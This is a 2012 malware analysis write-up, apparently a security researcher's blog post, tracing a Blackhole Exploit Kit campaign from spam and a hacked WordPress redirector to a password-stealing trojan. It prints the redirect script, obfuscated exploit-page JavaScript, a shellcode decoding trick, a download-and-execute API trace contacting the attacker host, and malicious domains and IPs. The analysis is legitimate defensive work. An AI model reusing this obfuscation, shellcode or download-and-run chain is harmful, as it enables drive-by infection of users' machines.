Infection Summary
Spam emails to redirector landing page.
Wordpress hacked page: isoheraly.wordpress.com / 74.200.244.59, 76.74.254.120,
72.233.2.58, 76.74.254.123, 74.200.243.251, 72.233.69.6
Landing page redirect: visionuvce.in / 173.254.28.115
PluginDetect/BHEK: pelamutrika.ru / 202.180.221.186
CNC/Proxy: 180.235.150.72:8080 , 203.113.98.131:80, 173.224.221.135:8080
206.176.226.157:8080, 132.248.49.112, 113.130.65.77
Here's the garbage:
Source of Infection
This time we would like to report the infection of trojan password stealer
which is having a campaign using the below url:
h00p://visionuvce.in/redirect.htm
The campaign it self is on-going under two pattern, one pattern via spam email:
You may aware of the email with subject:
"You have been sent a file (Filename: Gohe-43.pdf)"
or "Sendspace File Delivery Notification"
Not only spam, also a hacked wordpress page like the below url:
(WARNING, THE PAGE ABOVE IS UP AND ALIVE...)
We checked the sources of the infector link:
--18:17:50-- h00p://visionuvce.in/redirect.htm
=> `redirect.htm'
Resolving visionuvce.in... seconds 0.00, 173.254.28.115
Caching visionuvce.in => 173.254.28.115
Connecting to visionuvce.in|173.254.28.115|:80... seconds 0.00, connected.
---request begin---
GET /redirect.htm HTTP/1.0
Referer: http://www.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: visionuvce.in
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Date: Sat, 08 Dec 2012 09:17:50 GMT
Server: Apache
Last-Modified: Fri, 07 Dec 2012 14:38:47 GMT
ETag: "5162339-1a7-4d0442c60507d"
Accept-Ranges: bytes
Content-Length: 423
Cache-Control: max-age=1209600
Expires: Sat, 22 Dec 2012 09:17:50 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=30
Connection: Keep-Alive
Content-Type: text/html
---response end---
200 OK
Registered socket 1896 for persistent reuse.
Length: 423 [text/html]
100%[====================================>] 423 --.--K/s
18:17:51 (13.88 MB/s) - `redirect.htm' saved [423/423]
↑inside the html, there is a BHEK2 redirector↓
$ cat redirect.htm
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
</head>
<body>
<h1><b>Please wait a moment ... You will be forwarded... </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
<script>
var1=49;
var2=var1;
if(var1==var2)
{document.location="h00p://pelamutrika・ru:8080/forum/links/column.php";}
</script>
</body>
</html>
So this is how our crusade starts..
PluginDetect 0.7.9 with new shellcode obfuscation
Using the right parameter we fetched the column.php...
--18:22:20-- h00p://pelamutrika・ru:8080/forum/links/column.php
=> `column.php'
Resolving pelamutrika・ru... seconds 0.00, 202.180.221.186
Caching pelamutrika・ru => 202.180.221.186
Connecting to pelamutrika・ru|202.180.221.186|:8080... seconds 0.00, connected.
---request begin---
GET /forum/links/column.php HTTP/1.0
Referer: h00p://visionuvce・in/redirect.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: pelamutrika.ru:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Sat, 08 Dec 2012 09:20:14 GMT
Content-Type: text/html; charset=CP-1251
Connection: close
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
---response end---
200 OK
Length: unspecified [text/html]
18:22:28 (21.64 KB/s) - `column.php' saved [102600]
which contains latest obfuscated PluginDetect 0.7.9 --->>[PASTEBIN]
The structure of obfuscation is not special, is as per I commented below:
//let's ignore the html base tags...
<html><head><title></title></head><body>
// This is the jar infector applet to be directly downloaded, via IE header-
// "User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_23"
//
<applet archive="h00p://pelamutrika.ru:8080/forum/links/column.php?ckh=ldrxik&xnfinc=wyzs" code="hw">
<param name="prime" value="V0Kyl8qVwlKOrfrfj.tlK0j-8oqij%t-K0ow3D3xS.b1fO6oO68O68O11RFebhvO6qO60O1hO11O6qO6qO16O6CO6tRUb6.R-qbDRS.b8" />
<param name="val" value="Dyy3Ojj3e-"/></applet>
<div></div>
// First scattered evil script...
<script>gg="getA"+"ttri";qq="q";asd=function(){r=a[gg+"bute"](i);};p="p"+"a";</script>
// Hiding the array of obfuscation data in var q(0 to 32)in DIV tag....
<div id="q"
0=";08f70;28725;85k7m;58d7c;57g7q;84n78;....
1=
2
:
:
32=";72n30;6292h;47q83;78383;78949;02930;...
</div>
//The deobfuscator generator...
<script>
if(document.getElementsByTagName("div").length>0)
{
a=document.getElementById(qq);
s="";
for(i=0;;i++){
asd();
if(r){s=s+r;}else break;
}
a=zxv=s;
s=hwebewg="";
p=parseInt;
for(i=0;i<a.length;i+=2){
if(a["substr"](i,1)==";")continue;
if(document.getElementsByTagName("div").length>0)s+=String["fromCharCode"]((p(a.substr(i,2),27)+5)/2);
}
c=s;
if(window.document){e=eval("eval");
if(document.getElementsByTagName("div")[0].style.left==="")e(c);
}}
</script>
</body></html>
By using the previous post guidance on how to crack this -
obfuscation you can get the original infector code w/PluginDetect 0.7.9,
as per I pasted here --->>[PASTEBIN]
What's the difference of this BHEK2 Infection?
The difference is in the shellcode and the payload. Other differences are minors-
and insignificant to be reported in this blog.
The CVE exploits used in components (jar, pdf & swf) are also same as before,
means the below list of files are the same as previous week's report:
spn.jar, spn2.jar, spn3.jar, t.pdf, infector1.pdf, infector2.pdf, score.swf
The Shellcode
The shellcode itself is obfuscated in new way that automation tool can't crack it
automatically (yet), is in the below function:
function getShellCode(){
var a = "
8282!%5114!%15e4!%04e0!%3451!%e044!..
2191!%b1b1!%a121!%21b1!%9154!%3421!..
2191!%b181!%e451!%7115!%0485!%6085!..
8170!%8101!%2101!%a5d5!%9460!%1434!..
15e1!%eee6!%3733!%2e2a!%59b1!%7492!..
8224!%ce24!%82d5!%8a71!%2df6!%82d5!..
c224!%7de7!%82b7!%e324!%8ed5!%c3da!..
2a9e!%8217!%5312!%eec6!%4444!%60c4!..
7de7!%8282!%0d82!%b704!%b580!%8050!..
42fe!%47c0!%825a!%9282!%4cc2!%a59a!..
d5a5!%8204!%6482!%0474!%7dbc!%bed2!..
8724!%8207!%8282!%0c82!%ac1d!%7d7d!..
8a55!%0480!%583a!%3cb7!%17be!%3867!..
e43a!%b25f!%67c0!%673a!%d5ec!%3173!..
58b2!%964d!%1e16!%ddb1!%80b2!%3ae5!..
c0da!%fac1!%d53d!%11e2!%bee6!%8681!..
e502!%e73a!%8543!%423a!%3a86!%8681!..
042e!%0382!%ef08!%9ea0!%6618!%139c!..
.split("").
reverse().join("");
return a["replace"](/\%!/g, "%" + "u")
}
the split, reverse and join following by replacing"%1" with "%u" looks
confusing the wepawet or jsunpack, so it doesn't burped the correct result.
You can use my trick to write JS/code like below to crack it:
var x="";
var a = "8282!%5114!%15e4!%04e0!%3451!%e044!%9134!%2551!%74e..
492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%8..
%f4b5!%a5d4!%c2c0!%42fe!%47c0!%825a!%9282!%4cc2!%a59a!%a23c!..
a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f7..
414!%1414!%".split("").reverse().join("");
x=a["replace"](/\%!/g, "%" + "u");
eval(x);
And the eval() will be the correct shellcode as per below:
%u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u0ae9%u80fe%u2..
13%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%..
4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407..
%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1..
This format can be cracked well by some automation,
or, you can do it manually like I do by deleting "%u" + extract it into binary,
like the below snapshot (it is a hexed code..useless/unharmed one)
41 41 41 41 66 83 e4 fc fc eb 1O 58 31 c9 66 81 AAAAf......X1.f.
e9 Oa fe 8O 3O 28 4O e2 fa eb O5 e8 eb ff ff ff ....O(@.........
ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 ..]..w..L.h..h$.
58 34 7e a3 5e 2O 1b f3 4e a3 76 14 2b 5c 1b O4 X4~.^...N.v.+\..
a9 c6 3d 38 d7 d7 9O a3 68 18 eb 6e 11 2e 5d d3 ..=8....h..n..].
af 1c Oc ad cc 5d 79 c1 c3 64 79 7e a3 5d 14 a3 .....]y..dy~.]..
5c 1d 5O 2b dd 7e a3 5e O8 2b dd 1b e1 61 69 d4 \.P+.~.^.+...ai.
85 2b ed 1b f3 27 96 38 1O da 5c 2O e9 e3 25 2b .+...'.8..\...%+
f2 68 c3 d9 13 37 5d ce 76 a3 76 Oc 2b f5 4e a3 .h...7].v.v.+.N.
24 63 a5 6e c4 d7 7c Oc 24 a3 fO 2b f5 a3 2c a3 $c.n..|.$..+..,.
2b ed 83 76 71 eb c3 7b 85 a3 4O O8 a8 55 24 1b +..vq..{..@..U$.
5c 2b be c3 db a3 4O 2O a3 df 42 2d 71 cO bO d7 \+....@...B-q...
d7 d7 ca d1 cO 28 28 28 28 7O 78 42 68 4O d7 28 .....((((pxBh@.(
28 28 78 ab e8 31 78 7d a3 c4 a3 76 38 ab eb 2d ((x..1x}...v8..-
d7 cb 4O 47 46 28 28 4O 5d 5a 44 45 7c d7 3e ab ..@GF((@]ZDE|.>.
ec 2O a3 cO cO 49 d7 d7 d7 c3 2a c3 5a a9 c4 2c .....I....*.Z..,
29 28 28 a5 74 Oc 24 ef 2c Oc 5a 4d 4f 5b ef 6c )((.t.$.,.ZMO[.l
Oc 2c 5e 5a 1b 1a ef 6c Oc 2O O8 O5 5b O8 7b 4O .,^Z...l....[.{@
dO 28 28 28 d7 7e 24 a3 cO 1b e1 79 ef 6c 35 28 .(((.~$....y.l5(
5f 58 4a 5c ef 6c 35 2d O6 4c 44 44 ee 6c 35 21 _XJ\.l5-.LDD.l5!
28 71 a2 e9 2c 18 aO 6c 35 2c 69 79 42 28 42 28 (q..,..l5,iyB(B(
7b 7f 42 28 d7 7e 3c ad e8 5d 3e 42 28 7b d7 7e {.B(.~<..]>B({.~
2c 42 28 ab c3 24 7b d7 7e 2c ab eb 24 c3 2a c3 ,B(..${.~,..$.*.
3b 6f a8 17 28 5d d2 6f a8 17 28 5d ec 42 28 42 ;o..(].o..(].B(B
d6 d7 7e 2O cO b4 d6 d7 d7 a6 66 26 c4 bO d6 a2 ..~.......f&....
26 a1 47 29 95 1b e2 a2 73 33 ee 6e 51 1e 32 O7 &.G)....s3.nQ.2.
58 4O 5c 5c 58 12 O7 O7 58 4d 44 49 45 5d 5c 5a X@\\X...XMDIE]\Z
41 43 49 O6 5a 5d 12 1O 18 1O 18 O7 4e 47 5a 5d ACI.Z]......NGZ]
45 O7 44 41 46 43 5b O7 4b 47 44 5d 45 46 O6 58 E.DAFC[.KGD]EF.X
4O 58 17 51 4e 15 1b 18 12 19 46 12 19 41 12 19 @X.QN.....F..A..
41 12 1b 1b Oe 59 4d 15 1a 5e 12 19 43 12 19 45 A....YM..^..C..E
12 1b 1a 12 1b 1b 12 19 43 12 19 43 12 1b 19 12 ........C..C....
19 42 12 19 47 Oe 52 15 19 43 Oe 44 43 15 4O Oe .B..G.R..C.DC.@.
51 4e 15 41 28 28 QN.A((
This means the API ops using kernel32.dll & urlmon.dll
to download, save, run & register the malware into your PC:
0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://pelamutrika・ru:8080/forum/links/column.php?yf=30:1n:1i:1i:33&qe=2v:1k:1m:32:33:1k:1k:31:1j:1o&z=1k&lk=h&yf=i, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
The Payload
In the shellcode, it was showing the payload download url as per below:
h00p://pelamutrika・ru:8080/forum/links/column.php?yf=30:1n:1i:1i:33&qe=2v:1k:1m:32:33:1k:1k:31:1j:1o&z=1k&lk=h&yf=i
I fetched it like this:
--13:34:29-- h00p://pelamutrika.ru:8080/forum/links/column.php?yf=30:1n:1i:1i:33&qe=2v:1k:1m:32:33:1k:1k:31:1j:1o&z=1k&lk=h&yf=i
=> `column.php@yf=30%3A1n%3A1i%3A1i%3A33&qe=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&z=1k&lk=h&yf=i'
Resolving pelamutrika.ru... seconds 0.00, 202.180.221.186
Caching pelamutrika.ru => 202.180.221.186
Connecting to pelamutrika.ru|202.180.221.186|:8080... seconds 0.00, connected.
Created socket 1896.
Releasing 0x003d5768 (new refcount 1).
---request begin---
GET /forum/links/column.php?yf=30:1n:1i:1i:33&qe=2v:1k:1m:32:33:1k:1k:31:1j:1o&z=1k&lk=h&yf=i HTTP/1.0
Referer: h00p://pelamutrika.ru:8080/forum/links/column.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: pelamutrika.ru:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Sun, 09 Dec 2012 04:32:22 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Pragma: public
Expires: Sun, 09 Dec 2012 04:33:15 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="contacts.exe"
Content-Transfer-Encoding: binary
Content-Length: 121344
---response end---
200 OK
Registered socket 1896 for persistent reuse.
Length: 121,344 (119K) [application/x-msdownload]
100%[====================================>] 121,344 54.23K/s
13:34:33 (54.12 KB/s) - `column.php@yf=30%3A1n%3A1i%3A1i%3A33&qe=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&z=1k&lk=h&yf=i' saved [121344/121344]
And there is your payload :-)
You can also go through the infector**.pdf which having the same shellcode
to download the payload. Which proven myself as the same one.
What is this payload really does?
Let's save the payload into the original name in the server as "contacts.exe".
I analyzed the binary as per below:
0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 50 45 00 00 4C 01 05 00 BF 0F C2 50 00 00 00 00 PE..L......P....
0090 00 00 00 00 E0 00 0F 01 0B 01 02 32 00 46 00 00 ...........2.F..
00A0 00 94 01 00 00 00 00 00 00 10 00 00 00 10 00 00 ................
00B0 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 .p....@.........
: : :
MD5: a8ccedc5fe10ea98cb84a8ad20901d8e
Size: 118.5 KB ( 121344 bytes )
block 0x40
type EXEC (Executable file)
os windows
arch i386
bits 32
endian little
Valid PE file
Entry Point: 0x1000
Sections:
.code 0x1000 0x2312 9216 <=== EP
.text 0x4000 0x219a 8704
.rdata 0x7000 0xc0 512
.data 0x8000 0xa8c 2048
Compile Time: 0x50C20FBF [Fri Dec 07 15:48:15 2012 UTC]
Compiler Trace: MS Visual C++
CRC Failed. Claimed: 0, Actual: 153281
Invalid Import data at RVA: 0x8244 // Crypter?
the RVA is invalid: 0x2e2e9020 // Crypter?
//Suspicious DLL's Calls
DEP setting change trace: 0x40837c HeapCreate
Anti Debugging traces : 0x40839c LoadLibraryA
Anti Debugging traces : 0x4083a0 GetProcAddress
TLS aware call : 0x408398 TlsAlloc
//Interesting strings: "MopLon66"suggested Crypt series..
File Mem Strings..
------------------------------------
0x005E00 0x409A00 MopLon66/
0x005EF0 0x409AF0 MopLon661MopLon66SXPOWOTSXOXWWXWWVRQVVURQSXTRTTOWOVQRPSRWXTWRXXUTPXMopLon66ID
0x01D951 0x421551 ,UMopLon66
Interesting!
All DLL calls can be reviewed well but many functions encrypted.
// We can see plainly the data text..
.rdata:00407004 0000000C C IsAppThemed
.rdata:00407010 0000000C C uxtheme.dll
.rdata:0040701C 0000000E C DllGetVersion
.rdata:0040702C 0000000D C COMCTL32.DLL
.rdata:0040703C 0000000B C AlphaBlend
.rdata:00407048 0000000C C msimg32.dll
.data:0040843E 00000007 C memset
.data:00408446 0000000B C MSVCRT.dll
.data:00408454 00000011 C GetModuleHandleA
.data:00408468 0000000B C HeapCreate
.data:00408476 0000000C C HeapDestroy
.data:00408484 0000000C C ExitProcess
.data:00408490 0000000D C KERNEL32.dll
.data:004084A0 00000007 C strlen
.data:004084AA 00000007 C strcpy
.data:004084B4 00000008 C strncpy
.data:004084BE 00000007 C strcat
.data:004084C8 00000005 C fabs
.data:004084D0 00000005 C ceil
.data:004084D8 00000007 C malloc
.data:004084E2 00000006 C floor
.data:004084EA 00000005 C free
.data:004084F2 00000007 C fclose
.data:004084FC 00000007 C memcpy
.data:00408506 00000007 C _CIexp
.data:00408510 00000009 C HeapFree
.data:0040851C 0000000A C HeapAlloc
.data:00408528 00000014 C GetCurrentProcessId
.data:0040853E 00000013 C GetCurrentThreadId
.data:00408554 00000009 C TlsAlloc
.data:00408560 0000000D C LoadLibraryA
.data:00408570 0000000F C GetProcAddress
.data:00408582 0000000C C FreeLibrary
.data:00408590 0000000E C GetVersionExA
.data:004085A0 0000000C C HeapReAlloc
.data:004085AE 00000010 C CallWindowProcA
.data:004085C0 00000014 C GetForegroundWindow
.data:004085D6 00000019 C GetWindowThreadProcessI
.data:004085F2 00000010 C IsWindowVisible
.data:00408604 00000010 C IsWindowEnabled
.data:00408616 0000000F C GetWindowLongA
.data:00408628 0000000D C SetWindowPos
.data:00408638 0000000D C EnableWindow
.data:00408648 0000000C C EnumWindows
.data:00408656 0000000C C DestroyIcon
.data:00408664 00000009 C FillRect
.data:0040866E 0000000B C USER32.DLL
.data:0040867C 00000008 C EndPage
.data:00408686 00000007 C EndDoc
.data:00408690 0000000E C GetObjectType
.data:004086A0 0000000D C DeleteObject
.data:004086B0 0000000B C GetObjectA
.data:004086BE 00000013 C CreateCompatibleDC
.data:004086D4 0000000A C GetDIBits
.data:004086E0 00000009 C DeleteDC
.data:004086EC 00000011 C CreateDIBSection
.data:00408700 0000000D C SelectObject
.data:00408710 00000007 C BitBlt
.data:0040871A 0000000D C CreateBitmap
.data:0040872A 00000009 C SetPixel
.data:00408736 0000000F C GetStockObject
.data:00408746 0000000A C GDI32.DLL
.data:00408752 00000011 C GetSaveFileNameA
.data:00408766 00000011 C GetOpenFileNameA
.data:00408778 0000000D C COMDLG32.DLL
.data:00408788 00000015 C InitCommonControlsEx
.data:0040879E 0000000D C COMCTL32.DLL
.data:004087AE 0000000D C CoInitialize
.data:004087BC 0000000A C OLE32.DLL
While the .rsrc data is crypted..with (AGAIN) signed: "MopLon66"
.rsrc:004094C9 00000005 C E????
.rsrc:004094D0 0000000E C 884L4+8+4+444,
.rsrc:00409510 00000005 C ++++4
.rsrc:00409521 00000005 C ?<!??
.rsrc:00409530 00000007 C +44U((E
.rsrc:0040953E 00000005 C G&???
.rsrc:00409549 00000006 C PPYEEE
.rsrc:00409557 0000000A C ?E,?=!;EAX
.rsrc:00409587 00000005 C P!PPP
.rsrc:0040959E 00000007 C 6G/$@4P
.rsrc:004095A6 00000007 C P !;;;P
.rsrc:004095BA 00000005 C J\t%\t\t
.rsrc:004095CD 00000009 C E<E(=GGZZ
.rsrc:004095E1 00000009 C f@@@1W\x1BH/
.rsrc:004095F8 00000007 C >C:%\t$$
.rsrc:00409603 0000000A C TML]GG'>>9
.rsrc:0040960E 00000005 C 6CX@:
.rsrc:00409615 00000006 C 02\b\v\vL
.rsrc:0040961C 0000001B C J%\rC,0\\>\bRM6='^d:@X6V9:C>L%
: : : : :
: : : : :
.rsrc:00420B24 00000006 C ,ik0kK
.rsrc:00420CB3 00000005 C o!3JZ
.rsrc:00420CE7 00000007 C ,pu//Io
.rsrc:00420D0C 00000008 C l!af[Glr
.rsrc:00420E58 00000005 C \ns0bs
.rsrc:00420E9B 00000005 C FXl\r6
.rsrc:00420EDE 00000005 C !\r;{d
.rsrc:00420F47 00000005 C o'8@/
.rsrc:00420F9E 00000007 C \nCG\n/}u
.rsrc:00420FAF 00000006 C 6,-!dR
.rsrc:0042117F 00000005 C &NPw:
.rsrc:00421195 00000008 C fE='u@IY
.rsrc:0042130E 00000005 C o7$WQ
.rsrc:00421551 0000000B C ,UMopLon66 <====THERE.
Let's reverse it, I doubt it works well though... :-)
Well, to make it short, you'll see the a lot of undefined calls/fuctions like below:
Which if you push it hard, it'll drag you to the exit command below:
loc_401B5E: ; uExitCode
push 0
call sub_401B78
push hHeap ; hHeap
call j_HeapDestroy
call j_ExitProcess
start endp
↑this is suggested that you should reverse w/breaking the crypter 1st.
Got no much time to play w/this so let's run & see the evil acts.
Behavior Analysis
So friends, if you have an old PC, just install it with windows XP,
and then install Wireshark, Regshot & Process Explorer so
you can analyze how malware works!
Do not depend in any VM environment in testing the malwares -
since the recent malware are compiled with code to detect -
VM. And this is base of my personal experience, w/o VM -
simulation you'll get much more data than they who used VM.
If you are doing daily work in service center, please -
propose your boss to prepare a cheap junk PCs for this -
purpose :-)
For the setup, use he basic installation of WinXP, with -
Java, Adobe, and IE w.the older versions is the better.
Then back it up all harddisk with Norton Ghost or G4L,
to be restore after any test try.
The softwares installed are as per my junkPC/RAT screeshot below:
↑It's how I tested this "mess". See the marked parts, They are the softwares -
I explained before plus some shortcut for pic snapshot (I use ONLY mspaint + notepad)
and use full intranet connection + USB attached (for saving data).
:-) Says who that analyzing malware is difficult? It is simple is it?
So I just run the contacts.exe it as per pic above, it will just self-deleted,
copied + executed KB0077165.exe with CMD command,
and all of the sudden stopped and then the NEW malicious file's process started..↓
If we carefully see the details, it was started from the %Temp% path↓
If we see the %Temp% there were files dropped by this malware↓
This malware also creates threads via kernel.dll as per below snapshot:
Which suggested threaded as service. Let's find out deeper about how it goes below:
The new downloaded file itself has the below details:
0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 F1 B6 E2 5C B5 D7 8C 0F B5 D7 8C 0F B5 D7 8C 0F ................
0090 36 DF 83 0F B0 D7 8C 0F 36 DF D1 0F B8 D7 8C 0F 6.......6.......
00A0 B5 D7 8D 0F EA D7 8C 0F 3B DF D3 0F B8 D7 8C 0F ........;.......
00B0 36 DF D0 0F B4 D7 8C 0F 3B DF EC 0F B8 D7 8C 0F 6.......;.......
00C0 36 DF D2 0F B4 D7 8C 0F 36 DF D6 0F B4 D7 8C 0F 6.......6.......
00D0 52 69 63 68 B5 D7 8C 0F 00 00 00 00 00 00 00 00 Rich............
00E0 50 45 00 00 4C 01 05 00 36 A9 81 3F 00 00 00 00 PE..L...6..?....
00F0 00 00 00 00 E0 00 02 01 0B 01 08 00 00 60 02 00 .............`..
0100 00 10 01 00 00 00 00 00 C7 11 00 00 00 10 00 00 ................
: : :
MD5: dde1d5cfed7d5646239aed75c0cd0add
Size: 196.0 KB ( 200704 bytes )
Name: exp2.tmp.exe
block 0x40
type EXEC (Executable file)
os windows
arch i386
bits 32
endian little
Entry Point: 0x11c7
Compile Time: 0x3F81A936 [Mon Oct 06 17:41:10 2003 UTC]
Compiler Trace: MS Visual C++
Sections:
.text 0x1000 0x25052 155648
.rdata 0x27000 0x9d4 4096
.data 0x28000 0x100418 4096
.rsrc 0x129000 0x67a0 28672
//Fake MS Product Attributes:
LangID: 040904B0
LegalCopyright: \xa9 Microsoft Corporation. All rights reserved.
InternalName: Eudcedit
FileVersion: 5.2.3790.3959 (srv03_sp2_rtm.070216-1710)
CompanyName: Microsoft Corporation
ProductName: Microsoft\xae Windows\xae Operating System
ProductVersion: 5.2.3790.3959
FileDescription: Private Character Editor
OriginalFilename: EUDCEDIT.EXE
//Full Registry Activity...(incl. Deletion...)
ADVAPI32.dll.RegCloseKey Hint[395]
ADVAPI32.dll.RegSetValueExW Hint[442]
ADVAPI32.dll.RegQueryInfoKeyW Hint[426]
ADVAPI32.dll.RegDeleteValueW Hint[405]
ADVAPI32.dll.RegEnumValueW Hint[412]
ADVAPI32.dll.RegEnumKeyExW Hint[409]
ADVAPI32.dll.RegDeleteKeyW Hint[403]
ADVAPI32.dll.RegCreateKeyExW Hint[400]
ADVAPI32.dll.RegOpenKeyExW Hint[421]
// interesting strings...
.text:0040B554 00000779 C vo8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8
.text:0041172C 00000177 C o8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho.text:0041B0A4 000000DD C ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho8ho3\a
